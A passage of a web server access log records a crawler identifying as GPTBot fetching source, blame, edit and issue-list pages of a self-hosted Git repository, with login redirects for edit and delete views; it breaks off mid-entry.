"https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/test_run.bat" -[17/Feb/2026:18:29:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" -[17/Feb/2026:18:29:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:18:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" -[17/Feb/2026:18:29:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:29:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:18:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" -[17/Feb/2026:18:29:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/build_exe.bat" -[17/Feb/2026:18:29:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13543] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12810] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12810] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13546] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13541] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15376] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13541] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12809] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15376] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13541] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12809] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15374] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12813] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15381] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15375] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md?display=source" [Client 74.7.227.38] [Length 20213] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/ENV_SETUP_GUIDE.md" -[17/Feb/2026:18:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" -[17/Feb/2026:18:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10084] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=latest&state=all&type=all" -[17/Feb/2026:18:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" -[17/Feb/2026:18:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&sort=latest&state=all&type=all" -[17/Feb/2026:18:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11093] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11092] [Gzip 